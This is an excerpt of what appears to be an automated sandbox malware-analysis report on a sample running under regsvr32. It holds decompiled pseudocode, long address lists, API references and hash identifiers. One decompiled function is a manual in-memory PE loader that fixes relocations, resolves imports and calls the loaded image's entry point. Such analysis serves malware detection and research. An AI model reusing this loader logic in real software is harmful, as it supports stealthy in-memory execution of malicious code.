						L41:
						E049E5F6F( &_v588);
						_t72 = _t178;
						L42:
						return _t72;
					}
					goto L4;
				}
			}


























































                                                                                                                                                                        0x049e50b3
                                                                                                                                                                        0x049e50c0
                                                                                                                                                                        0x049e50cb
                                                                                                                                                                        0x049e50d0
                                                                                                                                                                        0x049e50d2
                                                                                                                                                                        0x049e50d5
                                                                                                                                                                        0x049e50da
                                                                                                                                                                        0x049e50df
                                                                                                                                                                        0x049e50e2
                                                                                                                                                                        0x049e50ec
                                                                                                                                                                        0x049e50ee
                                                                                                                                                                        0x049e50f3
                                                                                                                                                                        0x049e50fb
                                                                                                                                                                        0x049e5104
                                                                                                                                                                        0x049e5104
                                                                                                                                                                        0x049e5111
                                                                                                                                                                        0x049e512c
                                                                                                                                                                        0x049e512e
                                                                                                                                                                        0x049e5133
                                                                                                                                                                        0x049e5138
                                                                                                                                                                        0x049e513e
                                                                                                                                                                        0x049e514d
                                                                                                                                                                        0x049e516c
                                                                                                                                                                        0x049e516e
                                                                                                                                                                        0x049e5173
                                                                                                                                                                        0x049e5174
                                                                                                                                                                        0x049e517a
                                                                                                                                                                        0x049e517f
                                                                                                                                                                        0x049e5186
                                                                                                                                                                        0x049e5190
                                                                                                                                                                        0x049e5192
                                                                                                                                                                        0x049e5193
                                                                                                                                                                        0x049e519e
                                                                                                                                                                        0x049e51a0
                                                                                                                                                                        0x049e51a3
                                                                                                                                                                        0x049e51a8
                                                                                                                                                                        0x049e51af
                                                                                                                                                                        0x049e51d3
                                                                                                                                                                        0x049e51d3
                                                                                                                                                                        0x049e51d8
                                                                                                                                                                        0x049e523f
                                                                                                                                                                        0x049e5244
                                                                                                                                                                        0x049e5246
                                                                                                                                                                        0x049e5250
                                                                                                                                                                        0x049e5255
                                                                                                                                                                        0x049e5255
                                                                                                                                                                        0x049e526f
                                                                                                                                                                        0x049e5271
                                                                                                                                                                        0x049e5274
                                                                                                                                                                        0x049e5276
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e527c
                                                                                                                                                                        0x049e5283
                                                                                                                                                                        0x049e5286
                                                                                                                                                                        0x049e528f
                                                                                                                                                                        0x049e5294
                                                                                                                                                                        0x049e529a
                                                                                                                                                                        0x049e529f
                                                                                                                                                                        0x049e52a4
                                                                                                                                                                        0x049e52a8
                                                                                                                                                                        0x049e52aa
                                                                                                                                                                        0x049e52ae
                                                                                                                                                                        0x049e52ae
                                                                                                                                                                        0x049e52b3
                                                                                                                                                                        0x049e52b6
                                                                                                                                                                        0x049e52b8
                                                                                                                                                                        0x049e52bc
                                                                                                                                                                        0x049e52bc
                                                                                                                                                                        0x049e52c3
                                                                                                                                                                        0x049e52c8
                                                                                                                                                                        0x049e52cc
                                                                                                                                                                        0x049e52cf
                                                                                                                                                                        0x049e52d4
                                                                                                                                                                        0x049e52da
                                                                                                                                                                        0x049e52db
                                                                                                                                                                        0x049e5303
                                                                                                                                                                        0x049e5309
                                                                                                                                                                        0x049e5310
                                                                                                                                                                        0x049e531f
                                                                                                                                                                        0x049e5324
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e5324
                                                                                                                                                                        0x049e5312
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e52dd
                                                                                                                                                                        0x049e52dd
                                                                                                                                                                        0x049e52e2
                                                                                                                                                                        0x049e52e9
                                                                                                                                                                        0x049e532e
                                                                                                                                                                        0x049e532e
                                                                                                                                                                        0x049e5335
                                                                                                                                                                        0x049e5339
                                                                                                                                                                        0x049e533a
                                                                                                                                                                        0x049e533a
                                                                                                                                                                        0x049e5344
                                                                                                                                                                        0x049e5349
                                                                                                                                                                        0x049e534c
                                                                                                                                                                        0x049e534d
                                                                                                                                                                        0x049e534f
                                                                                                                                                                        0x049e5351
                                                                                                                                                                        0x049e5356
                                                                                                                                                                        0x049e535d
                                                                                                                                                                        0x049e53a0
                                                                                                                                                                        0x049e535f
                                                                                                                                                                        0x049e5364
                                                                                                                                                                        0x049e536c
                                                                                                                                                                        0x049e5370
                                                                                                                                                                        0x049e537b
                                                                                                                                                                        0x049e5386
                                                                                                                                                                        0x049e538e
                                                                                                                                                                        0x049e5392
                                                                                                                                                                        0x049e539a
                                                                                                                                                                        0x049e539a
                                                                                                                                                                        0x049e535d
                                                                                                                                                                        0x049e53a6
                                                                                                                                                                        0x049e53a9
                                                                                                                                                                        0x049e53ab
                                                                                                                                                                        0x049e53b1
                                                                                                                                                                        0x049e53b1
                                                                                                                                                                        0x049e53b3
                                                                                                                                                                        0x049e53b3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e53b3
                                                                                                                                                                        0x049e52eb
                                                                                                                                                                        0x049e52eb
                                                                                                                                                                        0x049e52f1
                                                                                                                                                                        0x049e52f3
                                                                                                                                                                        0x049e52f8
                                                                                                                                                                        0x049e52f8
                                                                                                                                                                        0x049e52fa
                                                                                                                                                                        0x049e5329
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e5329
                                                                                                                                                                        0x049e52fc
                                                                                                                                                                        0x049e518a
                                                                                                                                                                        0x049e518a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e518a
                                                                                                                                                                        0x049e52db
                                                                                                                                                                        0x049e51de
                                                                                                                                                                        0x049e51ec
                                                                                                                                                                        0x049e51ff
                                                                                                                                                                        0x049e5204
                                                                                                                                                                        0x049e520a
                                                                                                                                                                        0x049e520c
                                                                                                                                                                        0x049e5224
                                                                                                                                                                        0x049e5229
                                                                                                                                                                        0x049e5232
                                                                                                                                                                        0x049e5238
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e5238
                                                                                                                                                                        0x049e5214
                                                                                                                                                                        0x049e521d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e521d
                                                                                                                                                                        0x049e51b1
                                                                                                                                                                        0x049e51b1
                                                                                                                                                                        0x049e51b7
                                                                                                                                                                        0x049e51b9
                                                                                                                                                                        0x049e51c6
                                                                                                                                                                        0x049e51c8
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e51ca
                                                                                                                                                                        0x049e51ce
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e51ce
                                                                                                                                                                        0x049e51bf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e51bf
                                                                                                                                                                        0x049e5188
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e5113
                                                                                                                                                                        0x049e511e
                                                                                                                                                                        0x049e5124
                                                                                                                                                                        0x049e5126
                                                                                                                                                                        0x049e53b5
                                                                                                                                                                        0x049e53b9
                                                                                                                                                                        0x049e53be
                                                                                                                                                                        0x049e53c0
                                                                                                                                                                        0x049e53c6
                                                                                                                                                                        0x049e53c6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e5126

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$lstrcpy$memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1985475764-0
                                                                                                                                                                        • Opcode ID: a52a2b410f394ea9b65ef8e3513b9270d0068a2c5ca53c6561c84436ba886115
                                                                                                                                                                        • Instruction ID: e2802bc2a2de9f6eb4e2be9e153f21cbb0952ee657d63be09ba1185bb28c87f7
                                                                                                                                                                        • Opcode Fuzzy Hash: a52a2b410f394ea9b65ef8e3513b9270d0068a2c5ca53c6561c84436ba886115
                                                                                                                                                                        • Instruction Fuzzy Hash: 4981E171704301ABE716EFA2D844F7A77EAEBC4328F14493DE5558B290EB74F8058B41
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049EDE26 Relevance: 9.1, APIs: 6, Instructions: 98stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                        			E049EDE26(WCHAR* __ecx) {
				int _v8;
				WCHAR* _v12;
				WCHAR* _v16;
				WCHAR* _v140;
				WCHAR* _v144;
				short _v664;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				WCHAR* _t36;
				int _t40;
				signed int _t41;
				int _t44;
				signed int _t45;
				WCHAR* _t49;
				signed int _t51;
				WCHAR* _t52;
				void* _t53;

				_v8 = _v8 & 0x00000000;
				_v16 = __ecx;
				_t51 = 0;
				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
				_t44 = _v8;
				_t41 = 0;
				_v12 = _t28;
				if(_t44 <= 0) {
					L22:
					_t29 = _t28 | 0xffffffff;
					__eflags = _t29;
					return _t29;
				} else {
					goto L1;
				}
				do {
					L1:
					_t49 =  *(_t28 + _t41 * 4);
					_t30 =  *_t49 & 0x0000ffff;
					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
						_t40 = lstrlenW(_t49);
						_t45 = 0;
						if(_t40 <= 0) {
							L11:
							_t44 = _v8;
							_t51 = _t51 + 1;
							goto L12;
						} else {
							goto L8;
						}
						do {
							L8:
							if(_t49[_t45] == 0x2c) {
								_t49[_t45] = 0;
							}
							_t45 = _t45 + 1;
						} while (_t45 < _t40);
						goto L11;
					}
					L12:
					_t28 = _v12;
					_t41 = _t41 + 1;
				} while (_t41 < _t44);
				if(_t51 != 1) {
					if(__eflags <= 0) {
						goto L22;
					}
					_t52 = _v140;
					L17:
					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
						lstrcpynW(_v16, _t52, 0x104);
					} else {
						GetCurrentDirectoryW(0x104,  &_v664);
						_push(0);
						_push(_t52);
						_push(0x49fc9a0);
						_t36 = E049E9A5A( &_v664);
						_v12 = _t36;
						lstrcpynW(_v16, _t36, 0x104);
						E049E8BF4( &_v12, 0xfffffffe);
					}
					return 0;
				}
				_t52 = _v144;
				goto L17;
			}





















                                                                                                                                                                        0x049ede2f
                                                                                                                                                                        0x049ede36
                                                                                                                                                                        0x049ede39
                                                                                                                                                                        0x049ede46
                                                                                                                                                                        0x049ede4c
                                                                                                                                                                        0x049ede4f
                                                                                                                                                                        0x049ede51
                                                                                                                                                                        0x049ede56
                                                                                                                                                                        0x049edf2e
                                                                                                                                                                        0x049edf2e
                                                                                                                                                                        0x049edf2e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ede5c
                                                                                                                                                                        0x049ede5c
                                                                                                                                                                        0x049ede5c
                                                                                                                                                                        0x049ede5f
                                                                                                                                                                        0x049ede65
                                                                                                                                                                        0x049ede81
                                                                                                                                                                        0x049ede88
                                                                                                                                                                        0x049ede8e
                                                                                                                                                                        0x049ede92
                                                                                                                                                                        0x049edea6
                                                                                                                                                                        0x049edea6
                                                                                                                                                                        0x049edea9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ede94
                                                                                                                                                                        0x049ede94
                                                                                                                                                                        0x049ede99
                                                                                                                                                                        0x049ede9d
                                                                                                                                                                        0x049ede9d
                                                                                                                                                                        0x049edea1
                                                                                                                                                                        0x049edea2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ede94
                                                                                                                                                                        0x049edeaa
                                                                                                                                                                        0x049edeaa
                                                                                                                                                                        0x049edead
                                                                                                                                                                        0x049edeae
                                                                                                                                                                        0x049edeb5
                                                                                                                                                                        0x049edebf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049edec1
                                                                                                                                                                        0x049edec7
                                                                                                                                                                        0x049edecb
                                                                                                                                                                        0x049edf24
                                                                                                                                                                        0x049eded4
                                                                                                                                                                        0x049edee1
                                                                                                                                                                        0x049edee7
                                                                                                                                                                        0x049edee9
                                                                                                                                                                        0x049edef0
                                                                                                                                                                        0x049edef6
                                                                                                                                                                        0x049edefe
                                                                                                                                                                        0x049edf06
                                                                                                                                                                        0x049edf12
                                                                                                                                                                        0x049edf18
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049edf2a
                                                                                                                                                                        0x049edeb7
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 049EDE3B
                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 049EDE46
                                                                                                                                                                        • lstrlenW.KERNEL32 ref: 049EDE88
                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 049EDEE1
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 049EDF06
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000104), ref: 049EDF24
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1259063344-0
                                                                                                                                                                        • Opcode ID: 5fdb4c11261d27ee297ed67306223013aa53ac0856287bfc23242907a00a8985
                                                                                                                                                                        • Instruction ID: aa9d7fe23f2e4d7f86929e14f50dbdacb220ec10c282dfb35b3f4dd8aa7bee20
                                                                                                                                                                        • Opcode Fuzzy Hash: 5fdb4c11261d27ee297ed67306223013aa53ac0856287bfc23242907a00a8985
                                                                                                                                                                        • Instruction Fuzzy Hash: C631D271900117EBEB2AAB5AC88CBBDB779EF55310F144A7DE806E2094E770A9808B50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049EE656 Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 049EE66A
                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 049EE672
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 049EE686
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 049EE701
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 049EE704
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 049EE709
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: String$AllocFree
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 344208780-0
                                                                                                                                                                        • Opcode ID: d3327cbb3c5cd0d50e4ccc47b0ad9aa5bf68672644739685da90b0d9256b9ca0
                                                                                                                                                                        • Instruction ID: 8c5d35929949166e5f4795d697718985080be8cc5f849dd13204870dd0600668
                                                                                                                                                                        • Opcode Fuzzy Hash: d3327cbb3c5cd0d50e4ccc47b0ad9aa5bf68672644739685da90b0d9256b9ca0
                                                                                                                                                                        • Instruction Fuzzy Hash: CF21FFB5900218BFDF01DFA5CC84DAF7BBDFF48654B144469F505A7250DA71AE01CB60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049F3D66 Relevance: 7.8, APIs: 5, Instructions: 322libraryloaderstringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 20%
                                                                                                                                                                        			E049F3D66(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				signed int* _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed short* _v52;
				intOrPtr _v56;
				unsigned int _v60;
				intOrPtr _v64;
				_Unknown_base(*)()* _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				unsigned int _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				CHAR* _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _t216;
				signed int _t233;
				void* _t273;
				signed int _t278;
				signed int _t280;
				intOrPtr _t320;

				_v44 = _v44 & 0x00000000;
				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v20 = _v84;
				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
				_v64 = _t320;
				if(_t320 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
						L35:
						if(_a16 == 0) {
							L54:
							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
							while(0 != 0) {
							}
							if(_a12 != 0) {
								 *_a12 = _v80;
							}
							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
							_v124 = _v80(_a4, 1, _a8);
							while(0 != 0) {
							}
							if(_v124 != 0) {
								if(_v44 == 0) {
									L77:
									return 1;
								}
								if(_a20 != 1) {
									if(_a20 != 2) {
										L75:
										while(0 != 0) {
										}
										goto L77;
									}
									while(0 != 0) {
									}
									_v132 = _v44;
									goto L75;
								}
								while(0 != 0) {
								}
								_v44();
								goto L75;
							}
							while(0 != 0) {
							}
							return 0;
						}
						while(0 != 0) {
						}
						_push(8);
						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
							goto L54;
						}
						_v128 = 0x80000000;
						_t216 = 8;
						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
						_v104 =  *((intOrPtr*)(_v76 + 0x18));
						while(0 != 0) {
						}
						_v40 = _v40 & 0x00000000;
						while(_v40 < _v104) {
							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
							if(lstrcmpA(_v116, _a16) != 0) {
								_v40 = _v40 + 1;
								continue;
							}
							while(0 != 0) {
							}
							_v44 = _v120;
							break;
						}
						if(_v44 != 0) {
							goto L54;
						}
						while(0 != 0) {
						}
						return 0xffffffff;
					}
					_v96 = 0x80000000;
					_t233 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v24 =  *_v16 + _a4;
							}
							_v72 = _v72 & 0x00000000;
							while( *_v24 != 0) {
								if(( *_v24 & _v96) == 0) {
									_v100 =  *_v24 + _a4;
									_v68 = GetProcAddress(_v36, _v100 + 2);
								} else {
									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v24 = _v68;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
								}
								_v24 =  &(_v24[1]);
								_v72 = _v72 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t273 = 0xfffffffd;
							return _t273;
						}
					}
					goto L35;
				}
				_t278 = 8;
				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
				_t280 = 8;
				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
				while(0 != 0) {
				}
				while(_v56 > 0) {
					_v28 = _v52[2];
					_v56 = _v56 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v52[4]);
					_v92 = _a4 +  *_v52;
					_v60 = _v28;
					while(1) {
						_v88 = _v60;
						_v60 = _v60 - 1;
						if(_v88 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v48 = (_v12 & 0x0000ffff) + _v92;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v48 =  *_v48 + _v64;
							}
						} else {
							 *_v48 =  *_v48 + _v64;
						}
						_v32 =  &(_v32[1]);
					}
					_v52 = _v32;
				}
				goto L13;
			}









































                                                                                                                                                                        0x049f3d6f
                                                                                                                                                                        0x049f3d7c
                                                                                                                                                                        0x049f3d82
                                                                                                                                                                        0x049f3d8b
                                                                                                                                                                        0x049f3d8e
                                                                                                                                                                        0x049f3d91
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f3e82
                                                                                                                                                                        0x049f3e86
                                                                                                                                                                        0x049f3e88
                                                                                                                                                                        0x049f3e96
                                                                                                                                                                        0x049f3fb4
                                                                                                                                                                        0x049f3fb8
                                                                                                                                                                        0x049f407d
                                                                                                                                                                        0x049f4086
                                                                                                                                                                        0x049f4089
                                                                                                                                                                        0x049f408d
                                                                                                                                                                        0x049f4093
                                                                                                                                                                        0x049f409b
                                                                                                                                                                        0x049f409b
                                                                                                                                                                        0x049f40a3
                                                                                                                                                                        0x049f40b1
                                                                                                                                                                        0x049f40b4
                                                                                                                                                                        0x049f40b8
                                                                                                                                                                        0x049f40be
                                                                                                                                                                        0x049f40ce
                                                                                                                                                                        0x049f40f9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f40fb
                                                                                                                                                                        0x049f40d4
                                                                                                                                                                        0x049f40e5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f40f3
                                                                                                                                                                        0x049f40f7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f40f3
                                                                                                                                                                        0x049f40e7
                                                                                                                                                                        0x049f40eb
                                                                                                                                                                        0x049f40f0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f40f0
                                                                                                                                                                        0x049f40d6
                                                                                                                                                                        0x049f40da
                                                                                                                                                                        0x049f40dc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f40dc
                                                                                                                                                                        0x049f40c0
                                                                                                                                                                        0x049f40c4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f40c6
                                                                                                                                                                        0x049f3fbe
                                                                                                                                                                        0x049f3fc2
                                                                                                                                                                        0x049f3fc4
                                                                                                                                                                        0x049f3fd2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f3fd8
                                                                                                                                                                        0x049f3fe1
                                                                                                                                                                        0x049f3fef
                                                                                                                                                                        0x049f3ffb
                                                                                                                                                                        0x049f4007
                                                                                                                                                                        0x049f4010
                                                                                                                                                                        0x049f4013
                                                                                                                                                                        0x049f4017
                                                                                                                                                                        0x049f4019
                                                                                                                                                                        0x049f4026
                                                                                                                                                                        0x049f403a
                                                                                                                                                                        0x049f4049
                                                                                                                                                                        0x049f405a
                                                                                                                                                                        0x049f4023
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f4023
                                                                                                                                                                        0x049f405c
                                                                                                                                                                        0x049f4060
                                                                                                                                                                        0x049f4065
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f4065
                                                                                                                                                                        0x049f4070
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f4072
                                                                                                                                                                        0x049f4076
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f4078
                                                                                                                                                                        0x049f3e9c
                                                                                                                                                                        0x049f3ea5
                                                                                                                                                                        0x049f3eb3
                                                                                                                                                                        0x049f3eb6
                                                                                                                                                                        0x049f3ed3
                                                                                                                                                                        0x049f3eda
                                                                                                                                                                        0x049f3eec
                                                                                                                                                                        0x049f3eec
                                                                                                                                                                        0x049f3ef3
                                                                                                                                                                        0x049f3f03
                                                                                                                                                                        0x049f3f1b
                                                                                                                                                                        0x049f3f05
                                                                                                                                                                        0x049f3f0d
                                                                                                                                                                        0x049f3f0d
                                                                                                                                                                        0x049f3f1e
                                                                                                                                                                        0x049f3f22
                                                                                                                                                                        0x049f3f32
                                                                                                                                                                        0x049f3f55
                                                                                                                                                                        0x049f3f67
                                                                                                                                                                        0x049f3f34
                                                                                                                                                                        0x049f3f48
                                                                                                                                                                        0x049f3f48
                                                                                                                                                                        0x049f3f71
                                                                                                                                                                        0x049f3f8d
                                                                                                                                                                        0x049f3f73
                                                                                                                                                                        0x049f3f82
                                                                                                                                                                        0x049f3f82
                                                                                                                                                                        0x049f3f95
                                                                                                                                                                        0x049f3f9e
                                                                                                                                                                        0x049f3f9e
                                                                                                                                                                        0x049f3fac
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f3ef5
                                                                                                                                                                        0x049f3ef7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f3ef7
                                                                                                                                                                        0x049f3ef3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f3eb6
                                                                                                                                                                        0x049f3d99
                                                                                                                                                                        0x049f3da7
                                                                                                                                                                        0x049f3dac
                                                                                                                                                                        0x049f3db7
                                                                                                                                                                        0x049f3dba
                                                                                                                                                                        0x049f3dbe
                                                                                                                                                                        0x049f3dc0
                                                                                                                                                                        0x049f3dd0
                                                                                                                                                                        0x049f3dd9
                                                                                                                                                                        0x049f3de2
                                                                                                                                                                        0x049f3dea
                                                                                                                                                                        0x049f3df3
                                                                                                                                                                        0x049f3dfe
                                                                                                                                                                        0x049f3e04
                                                                                                                                                                        0x049f3e07
                                                                                                                                                                        0x049f3e0a
                                                                                                                                                                        0x049f3e11
                                                                                                                                                                        0x049f3e18
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f3e23
                                                                                                                                                                        0x049f3e31
                                                                                                                                                                        0x049f3e3c
                                                                                                                                                                        0x049f3e46
                                                                                                                                                                        0x049f3e5e
                                                                                                                                                                        0x049f3e6b
                                                                                                                                                                        0x049f3e6b
                                                                                                                                                                        0x049f3e48
                                                                                                                                                                        0x049f3e53
                                                                                                                                                                        0x049f3e53
                                                                                                                                                                        0x049f3e72
                                                                                                                                                                        0x049f3e72
                                                                                                                                                                        0x049f3e7a
                                                                                                                                                                        0x049f3e7a
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 049F3ECD
                                                                                                                                                                        • LoadLibraryA.KERNEL32(00000000), ref: 049F3EE6
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 049F3F42
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 049F3F61
                                                                                                                                                                        • lstrcmpA.KERNEL32(?,00000000), ref: 049F4052
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$HandleLibraryLoadModulelstrcmp
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1872726118-0
                                                                                                                                                                        • Opcode ID: 012152bb7add481689419c0479f8882c46909875c2ba13718f120214a915217f
                                                                                                                                                                        • Instruction ID: 6edf1726ec780d0d00e1c6f6ba6b2aa6cef091259b738974a7caa269a2e93ef8
                                                                                                                                                                        • Opcode Fuzzy Hash: 012152bb7add481689419c0479f8882c46909875c2ba13718f120214a915217f
                                                                                                                                                                        • Instruction Fuzzy Hash: 3AE1C174A10209DFDB24CFA8C984AAEBBF5FF08314F148569EA15EB351D734A951CF50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049F19A9 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
